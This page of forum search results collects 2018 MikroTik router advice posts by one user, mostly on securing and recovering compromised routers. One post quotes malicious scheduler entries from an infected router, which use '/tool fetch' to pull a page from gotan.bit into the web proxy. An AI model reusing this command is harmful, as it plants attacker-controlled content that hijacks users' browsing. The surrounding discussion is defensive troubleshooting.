Community discussions

Search found 883 matches

by R1CH
Wed Oct 31, 2018 6:13 pm
Forum: General
Topic: Strange loop on update from 6.37.3 to 6.43.4
Replies: 5
Views: 582

Re: Strange loop on update from 6.37.3 to 6.43.4

Given the severity of the exploits, it's best to netinstall with a known good config. System level access allows attackers to install malware that isn't visible to RouterOS / winbox.
by R1CH
Wed Oct 31, 2018 1:25 pm
Forum: Wireless Networking
Topic: wpa3
Replies: 5
Views: 1255

Re: wpa3

Qualcomm even shared that the WPA3 security features will be incorporated in its chipsets for mobile devices starting with the Snapdragon 845 mobile platform in June 2018. WPA3 will be supported on all Qualcomm Access Point platforms by July 2018. Doesn't seem like this should require hardware supp...
by R1CH
Wed Oct 31, 2018 1:19 pm
Forum: General
Topic: Old kernel. Why?
Replies: 5
Views: 701

Re: Old kernel. Why?

One of the issues is that Mikrotik wrote a lot of their own proprietary kernel modules, they likely aren't compatible with newer kernels. It's a shame as a lot of the included drivers with newer kernels are much higher quality than Mikrotik's implementations (eg the QCA driver supports Wave 2 802.11...
by R1CH
Mon Oct 29, 2018 6:29 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

I ended up power cycling which resolved the issue (for now). Very strange, hopefully this doesn't happen to routers I don't have physical access to!
by R1CH
Mon Oct 29, 2018 6:28 pm
Forum: General
Topic: MikroTik and SSL website (Comodo)
Replies: 5
Views: 577

Re: MikroTik and SSL website (Comodo)

Have you set MTU appropriately and enabled PMTU clamping if necessary?
by R1CH
Mon Oct 29, 2018 6:27 pm
Forum: General
Topic: Performance problems with CRS112-8P-4S
Replies: 6
Views: 1358

Re: Performance problems with CRS112-8P-4S

The "S" in CRS112-8P-4S stands for SWITCH. Stop trying to use it as a router and you won't have these problems.

the switching power seems to be ok, the connected computers can send and receive with the full bandwidth of 1GBit.
by R1CH
Sun Oct 28, 2018 3:24 pm
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 17046

Re: CloudFlare DNS over TLS

Not sure, supposedly the update process wipes out any non-standard files so I'm not going to update until I have a very good reason to. I imagine Mikrotik will silently patch the jailbreak so I don't know how long this will be possible.
by R1CH
Fri Oct 26, 2018 7:03 pm
Forum: General
Topic: DHCP Rebinding Issue - stuck in rebinding until lease times out
Replies: 3
Views: 520

Re: DHCP Rebinding Issue - stuck in rebinding until lease times out

I've also seen this behavior at times. The Mikrotik DHCP client seems to have no end of little quirks and bugs like this, I wish we could just use udhcp which comes as part of busybox, it's well tested and should handle these kinds of cases much better.
by R1CH
Fri Oct 26, 2018 5:50 pm
Forum: General
Topic: How recovery hacked RB2011 via JTAG ?
Replies: 3
Views: 591

Re: How recovery hacked RB2011 via JTAG ?

Why can you not netinstall?
by R1CH
Fri Oct 26, 2018 5:49 pm
Forum: General
Topic: Firewall rules not working after hacker infection
Replies: 3
Views: 475

Re: Firewall rules not working after hacker infection

You should netinstall with a known good config. Once a router is compromised an attacker can get system level access that you cannot detect or repair from RouterOS UI.
by R1CH
Thu Oct 25, 2018 5:51 pm
Forum: General
Topic: firewall [SOLVED]
Replies: 5
Views: 659

Re: firewall [SOLVED]

Be aware that the default config in the latest "stable" version has no firewall either.

viewtopic.php?f=2&t=140661
by R1CH
Thu Oct 25, 2018 5:50 pm
Forum: General
Topic: Established connection question
Replies: 3
Views: 401

Re: Established connection question

These are connections to a service on your router. If you don't recognize them, your router might be compromised and running backdoor PPTP services, web proxy, SOCKS, etc.
by R1CH
Wed Oct 24, 2018 3:42 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 885

Re: Port Scan Drop ?

Port scan does not use established connections. If you're using a detect-and-block script, then the attacker can then just scan you with fake IP of Google, Facebook, DNS server, etc and suddenly you've blocked important services. Relying on a hidden port for security is not good, best to use a VPN o...
by R1CH
Wed Oct 24, 2018 2:25 pm
Forum: General
Topic: Missing default config after reset
Replies: 3
Views: 351

Re: Missing default config after reset

The default config was broken in the latest releases.

viewtopic.php?f=2&t=140661
by R1CH
Wed Oct 24, 2018 1:43 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 885

Re: Port Scan Drop ?

Best practice says you should drop all unknown input, there's no need to make rules specifically for port scanners.
by R1CH
Wed Oct 24, 2018 12:44 pm
Forum: General
Topic: Default configuration is broken?
Replies: 5
Views: 740

Re: Default configuration is broken?

QA on updates is getting quite poor lately. How does a change like this even happen to a "bugfix only" branch?
by R1CH
Tue Oct 23, 2018 4:21 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

No RADIUS / user manager or anything for me, just a simple SOHO setup.
by R1CH
Tue Oct 23, 2018 2:02 pm
Forum: RouterBOARD hardware
Topic: New High End Router Hardware Soon?
Replies: 11
Views: 1786

Re: New High End Router Hardware Soon?

Since TILE is a dead architecture in the Linux kernel there needs to be a high end model that will handle RouterOS v7 (if it ever comes out). I am worried more and more about how old the RouterOS v6 kernel is, many modern chipsets (both CPU and wireless etc) require newer kernels so the available ha...
by R1CH
Tue Oct 23, 2018 1:59 pm
Forum: RouterBOARD hardware
Topic: HAP AC2 Availability in the US
Replies: 11
Views: 1836

Re: HAP AC2 Availability in the US

I notice even EuroDK no longer has hAP AC2 in stock. Is there some kind of problem with the board that halted production?
by R1CH
Tue Oct 23, 2018 1:56 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 633

Re: Advanced IP scanners locks up winbox access?

I wonder if I'm experiencing the same issue. I'm locked out of winbox, webfig, mac-telnet and SSH on one of my routers, if I enter an incorrect username or password I immediately get a negative response, with the correct password the connection hangs for about a minute then says "Incorrect password".
by R1CH
Tue Oct 23, 2018 12:59 pm
Forum: General
Topic: How can I distinguish different certificate in Winbox?
Replies: 1
Views: 201

Re: How can I distinguish different certificate in Winbox?

Modern versions of RouterOS use the SRP protocol to avoid MITM. Prior to this, there was no host verification so MITM was easy.

https://en.wikipedia.org/wiki/Secure_Re ... d_protocol
by R1CH
Mon Oct 22, 2018 1:06 am
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 17046

Re: CloudFlare DNS over TLS

I've got DNS over TLS working on my hEX! If you've rooted your device (don't contact MT for support if you do this!) it's quite straightforward to install. Since cloudflared is written in Go, it's easy to cross-compile and the only thing it needs to operate is a ca-certificates.crt bundle which I co...
by R1CH
Tue Oct 16, 2018 2:22 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2782

Re: Qualcomm IPQ8074

Given how long it took for 802.11ac (which still isn't fully implemented!), I think it will be 2020 or later before Mikrotik come out with 802.11ax products :(.
by R1CH
Tue Oct 16, 2018 1:33 am
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2974

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

Finally had some time to play around with this. It works very well and there is almost zero risk of bricking your device. Can't wait to start experimenting with custom software on my router at last!
by R1CH
Fri Oct 12, 2018 5:28 pm
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2974

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

I wish there were an official way to do this rather than relying on tools that potentially cause issues or stop working in the future. Installing wireguard for example or proper openvpn with UDP support would be so useful.
by R1CH
Wed Oct 10, 2018 6:19 pm
Forum: General
Topic: Limiting ICMP on input chain
Replies: 3
Views: 916

Re: Limiting ICMP on input chain

Reminder that ICMP source addresses can be spoofed, adding addresses to a blacklist without being able to verify the source address is a bad practice. It's better to just rate limit (which is built into the kernel - check IP / Settings).
by R1CH
Wed Oct 10, 2018 1:15 pm
Forum: General
Topic: Can't Upgrade router mikrotik because hacked
Replies: 7
Views: 2121

Re: Can't Upgrade router mikrotik because hacked

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
by R1CH
Tue Oct 09, 2018 12:19 am
Forum: RouterBOARD hardware
Topic: Improove capacitor quality
Replies: 3
Views: 862

Re: Improove capacitor quality

How are we still having failing capacitors in 2018?!
by R1CH
Mon Oct 08, 2018 10:38 pm
Forum: General
Topic: CVE-2018-1156 and Winbox exploit
Replies: 0
Views: 674

CVE-2018-1156 and Winbox exploit

There's quite a few blogs going around today which makes it sound like there is some new Mikrotik exploit. It's not a new exploit, but discussions about the combination of the already patched winbox exploit + the already patched CVE-2018-1156 format string exploit. If a router is vulnerable to the w...
by R1CH
Mon Oct 08, 2018 1:04 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 4
Views: 6500

Re: Router is infection by virus coinhive

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then ...
by R1CH
Sat Oct 06, 2018 5:09 pm
Forum: General
Topic: Unable to get full gigabit speed on RB750Gr3
Replies: 28
Views: 3846

Re: Unable to get full gigabit speed on RB750Gr3

Most likely the device is not powerful enough, check system / resources while testing to check CPU usage.
by R1CH
Fri Oct 05, 2018 2:54 pm
Forum: Wireless Networking
Topic: IPQ4019 chipsets - random capacity loss
Replies: 8
Views: 1191

Re: IPQ4019 chipsets - random capacity loss

Many devices from other manufacturers use the IPQ401x chipset without issue. I suspect the problem is more to do with Mikrotik's proprietary driver than the ARM platform itself.
by R1CH
Fri Oct 05, 2018 12:50 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6477

Re: New standard 802.11ax

Any news? ASUS are releasing their RT-AX88U this month which is based on 802.11ax. Would love for Mikrotik to keep up with the home / office wifi space.
by R1CH
Thu Oct 04, 2018 12:19 am
Forum: General
Topic: Route cast to another VLAN
Replies: 3
Views: 303

Re: Route cast to another VLAN

Easiest solution is to put the TV on the guest VLAN, usually such devices are insecure and should be away from your main network anyway. Otherwise you will need to allow routing between the VLANs and forward the multicasts with something like https://github.com/sonicsnes/udp-broadcast-relay-redux
by R1CH
Wed Oct 03, 2018 3:43 pm
Forum: General
Topic: Router compromised even after updating firmware
Replies: 2
Views: 231

Re: Router compromised even after updating firmware

If you backed up from before the compromise, then the backup is safe to use. You can also export the compromised config and manually review it before importing it on a fresh router with changed passwords.
by R1CH
Mon Oct 01, 2018 3:41 pm
Forum: Wireless Networking
Topic: hap ac achievable wifi speed?
Replies: 28
Views: 2183

Re: hap ac achievable wifi speed?

Real world result from a phone in a room across from the hAP AC (wall mounted high up). Almost clear LOS (has to go through a doorway). -57 dBm on the hAP AC, -54 dBm on the phone. Upload limited by ISP.
by R1CH
Mon Oct 01, 2018 3:33 pm
Forum: General
Topic: dns requests to Mikrotik fail if udp on linux
Replies: 5
Views: 368

Re: dns requests to Mikrotik fail if udp on linux

I have an open ticket (#2016082522001037) about bad DNS behavior with the RB850Gx2, apparently with multi core some UDP packets are simply dropped. Perhaps it applies to the RB3011 also. This is a problem since the Linux resolver likes to send two queries at once, one for IPv4 and one for IPv6. Try ...
by R1CH
Mon Oct 01, 2018 3:30 pm
Forum: General
Topic: Winbox Protocol Dissector
Replies: 2
Views: 435

Re: Winbox Protocol Dissector

Very nice, this will make finding vulnerabilities in the protocol much easier!
by R1CH
Fri Sep 28, 2018 3:08 pm
Forum: General
Topic: something is wrong with my DNS resolving...
Replies: 8
Views: 674

Re: something is wrong with my DNS resolving...

Also be sure to change all passwords, if you ran a vulnerable version then the attacker got full access to all passwords on user accounts.
by R1CH
Thu Sep 27, 2018 10:52 pm
Forum: General
Topic: Suspect script foun
Replies: 3
Views: 867

Re: Suspect script foun

Do a netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Thu Sep 27, 2018 2:23 pm
Forum: General
Topic: Ports Filtered regardless of firewall rules
Replies: 1
Views: 657

Re: Ports Filtered regardless of firewall rules

If you're testing from outside your own LAN, this is almost certainly done by your ISP as those are commonly abused ports.
by R1CH
Thu Sep 27, 2018 2:21 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

Has anyone been able to order one of these yet? Seems like the expected stock arrival dates keep getting pushed back.
by R1CH
Thu Sep 27, 2018 2:19 pm
Forum: General
Topic: Mikrotik How to SSH from Linux to Mikrotik without Password
Replies: 2
Views: 484

Re: Mikrotik How to SSH from Linux to Mikrotik without Password

Agreed, you should not be using DSA in 2018. Even RSA isn't great, but Ed25519 keys are not yet supported by Mikrotik.
by R1CH
Wed Sep 26, 2018 3:35 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

I've had no issues with fs.com 10G DACs between Mikrotik, Netgear and Linksys gear. The stuff is all from China but they seem to have their logistics nailed down pretty well which is how they can offer such good pricing. I know a lot of other people in the industry also use FS so it's not like they'...
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 212

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] are released!
Replies: 186
Views: 38271

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 1298

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 19
Views: 2061

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 204

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through the admin interface. Most likely your router is compromised from leaving open ports on the WAN interface. You should netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 573

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 1072

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 1009

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 8
Views: 1012

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 213

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 388

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 398

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 480

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 489

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 1214

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 47
Views: 12652

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 389

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 148
Views: 28213

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 405

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited. Step 1: Turn off all unnecessary services in ip / services. Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 359
Views: 66072

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 448

Re: youtube cache on mikrotik router

On Mikrotik it is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 22
Views: 12592

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 293

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 770

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 2223

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
by R1CH
Thu Aug 23, 2018 8:05 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Bricked a wAP AC by installing this from 6.36 / 6.37 (wasn't paying close attention to the old version). Rebooted and ethernet is constantly cycling link / no-link, no netinstall, no backup loader. RMA time it seems.

Be careful if upgrading from older versions!
by R1CH
Thu Aug 23, 2018 3:52 am
Forum: RouterBOARD hardware
Topic: Cheapest device to support 5GHz spectral scan
Replies: 2
Views: 593

Re: Cheapest device to support 5GHz spectral scan

No Mikrotik device supports 5 GHz spectral scan.
by R1CH
Thu Aug 23, 2018 1:46 am
Forum: General
Topic: router rebooted because some critical program crashed
Replies: 5
Views: 1646

Re: router rebooted because some critical program crashed

Strong enough power supply?
by R1CH
Wed Aug 22, 2018 11:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

It's been a full business day and the blog is still not updated with the news about what these four security bugs from the latest RouterOS release actually are. This seems to be a step backwards, before the blog the changelog said things like "www) fixed vulnerability" so admins at least knew the ww...
by R1CH
Wed Aug 22, 2018 11:50 pm
Forum: General
Topic: MikroTiks Blocking Functionality on certain websites [SOLVED]
Replies: 3
Views: 365

Re: MikroTiks Blocking Functionality on certain websites [SOLVED]

Your client or network is considered bad to F5 Networks Application Security Manager (ASM) which is what is generating this message. Most likely because the poor firewall config let your Mikrotiks be infected and part of a botnet, so now your IP is blacklisted by certain vendors. Change IP / ISP.
by R1CH
Wed Aug 22, 2018 6:49 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

I can confirm that the security fixes were added to the notes after the 6.42.7 thread was already posted! Why was this?
by R1CH
Wed Aug 22, 2018 6:39 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Were these security fixes stealthily added to the v6.42.7 patch notes? I don't recall seeing them there before and I didn't update since it didn't look like a necessary update. It's very bad that details aren't available even though the fixed version is published. It doesn't take much effort to comp...
by R1CH
Wed Aug 22, 2018 6:34 pm
Forum: Announcements
Topic: v6.40.9 [bugfix] is released!
Replies: 56
Views: 14796

Re: v6.40.9 [bugfix] is released!

What is the point of publishing CVE numbers if the vulnerabilities are still private? Hackers can reverse engineer the changes in this version and figure out what the vulnerabilities are and start exploiting them, so there's no point keeping it private once you publish the fix - it only benefits hac...
by R1CH
Wed Aug 22, 2018 12:19 am
Forum: General
Topic: PSA: bandwidth-test Brute Force attempts
Replies: 2
Views: 482

Re: PSA: bandwidth-test Brute Force attempts

On a related note, it would be nice to see bandwidth-test server moved to IP / services so all the useless services can be disabled in one place.
by R1CH
Tue Aug 21, 2018 1:21 am
Forum: Wireless Networking
Topic: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T
Replies: 1
Views: 807

Re: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T

The RB2011 is a very old router (hence the name) which doesn't support 5 GHz, so no 802.11ac. Speeds you show are about what is expected for a 2.4 GHz network.

I recommend hAP AC / cAP AC / wAP AC instead depending on your installation needs.
by R1CH
Mon Aug 20, 2018 1:57 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 30437

Re: v6.42.7 [current] is released!

Upgraded 5 x wAP AC, no issues so far.
by R1CH
Sun Aug 19, 2018 9:38 pm
Forum: General
Topic: broswer shows establishing secure connection when eoip active
Replies: 2
Views: 297

Re: broswer shows establishing secure connection when eoip active

You probably need to enable PMTU clamping.
by R1CH
Sat Aug 18, 2018 12:13 am
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 862

Re: Open the regular browser after Captive Portal Popup login window

Sure, but those URLs will still only open in the captive portal window.
by R1CH
Fri Aug 17, 2018 5:17 pm
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 862

Re: Open the regular browser after Captive Portal Popup login window

No, you cannot control how the client's OS behaves. Captive portal windows are usually limited in what they can do for the specific purpose of signing in.
by R1CH
Wed Aug 15, 2018 3:40 pm
Forum: General
Topic: Kernel failure using traffic generator
Replies: 1
Views: 237

Re: Kernel failure using traffic generator

The traffic generator is a kernel module coded by Mikrotik. It likely has some bugs, and bugs in the kernel mean a complete crash. I would advise against using it outside of test environments.
by R1CH
Sun Aug 12, 2018 6:17 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

True, but using such services goes against the goals of speed anyway. OVPN in TCP mode is especially terrible.
by R1CH
Sat Aug 11, 2018 6:41 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 513

Re: TCP congestion Illinos

Router doesn't care about the congestion algorithm, it simply forwards packets. It needs to be configured on the endpoints of the connection.
by R1CH
Sat Aug 11, 2018 2:09 am
Forum: General
Topic: TCP connections from china
Replies: 9
Views: 4814

Re: TCP connections from china

If someone is able to connect to that port, your router is insecure. Make sure to firewall all ports from WAN.
by R1CH
Thu Aug 09, 2018 1:46 pm
Forum: Wireless Networking
Topic: Open url / link from Hotspot login page in a browser
Replies: 1
Views: 308

Re: Open url / link from Hotspot login page in a browser

This is entirely dependent on the client device and not something you can configure.
by R1CH
Thu Aug 09, 2018 1:39 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3688

Re: Security breached devices - Port TCP 4145

I think you misunderstand, this isn't about services listening on high ports. Say for example a client on the network wants to connect to Google DNS, 8.8.8.8 port 53. Their OS has to pick a port on the system to send the query, and to which replies are sent, for example maybe it picks 192.168.88.10 por...
by R1CH
Thu Aug 09, 2018 12:49 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 12
Views: 3688

Re: Security breached devices - Port TCP 4145

Traffic above the reserved ports (0-1024) can be attributed to ephemeral port use. While most OSes generally use the higher end of available ports, there's nothing stopping them from using 1025-65535 as ephemeral port numbers.
by R1CH
Thu Aug 09, 2018 12:46 pm
Forum: Announcements
Topic: WPA2 preshared key brute force attack
Replies: 26
Views: 24776

Re: WPA2 preshared key brute force attack

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
by R1CH
Wed Aug 08, 2018 6:10 pm
Forum: RouterBOARD hardware
Topic: upgrade from RB951G-2HnD
Replies: 3
Views: 497

Re: upgrade from RB951G-2HnD

The IPQ4018 used in new products is much faster than the CPU in RB951G-2HnD.
by R1CH
Wed Aug 08, 2018 1:18 am
Forum: General
Topic: Winbox Vulnerability Changes
Replies: 1
Views: 334

Re: Winbox Vulnerability Changes

The vulnerability allows someone full admin access to the router, so they could change anything and everything. Mikrotik seem to suggest that winbox can even be elevated to shell access, in which case undetectable backdoors could be installed. The safest way to restore a router is to export the config,...
by R1CH
Tue Aug 07, 2018 7:11 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3129

Re: PMKID Attack - clientless WPA2/WPA PSK attack

I've attempted this attack against a wAP AC and it was unsuccessful. I don't think Mikrotik's wireless driver implements the features that this attack exploits.
by R1CH
Tue Aug 07, 2018 2:24 pm
Forum: General
Topic: Block devices with cloned MAC addresses
Replies: 2
Views: 338

Re: Block devices with cloned MAC addresses

The only decent way is to use EAP / 802.1x for authentication so there are per-client encryption keys.
by R1CH
Tue Aug 07, 2018 2:12 pm
Forum: General
Topic: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!
Replies: 2
Views: 762

Re: Warning BotNet Attacks! Noticing These IP's! Suggest blocking them!

If the bots are even able to try to log in, this means you are exposing winbox / SSH to the internet, and your router will be compromised when the next exploit is found. Any router that has open ports to the internet is not secure according to Mikrotik.
by R1CH
Tue Aug 07, 2018 2:11 pm
Forum: General
Topic: 100% CPU CCR1072 due DDoS - How to improve?
Replies: 16
Views: 1182

Re: 100% CPU CCR1072 due DDoS - How to improve?

close port 80 from outside use. This is not a solution to CPU consumption. Also, if it's a web server you can't do this, it's a useless solution because the attacker can choose any port. It is a solution if you have a listening service on port 80. This is a SYN flood, if you actually have an applic...
by R1CH
Mon Aug 06, 2018 5:48 pm
Forum: General
Topic: HTTPS & Force to login from devices
Replies: 2
Views: 321

Re: HTTPS & Force to login from devices

Allowing *google* and gstatic.com will likely break captive portal detection on client devices.
by R1CH
Mon Aug 06, 2018 5:44 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

I've been playing around with Wireguard recently and it's so refreshingly simple and fast, it makes setup of a new VPN link so easy. And the fact it uses modern, fast crypto is great - I would love to see this in RouterOS so I can finally ditch ipsec with its huge complexity and outdated crypto. And...
by R1CH
Sun Aug 05, 2018 6:42 pm
Forum: General
Topic: Problem with purchased certificate from Comodo
Replies: 3
Views: 405

Re: Problem with purchased certificate from Comodo

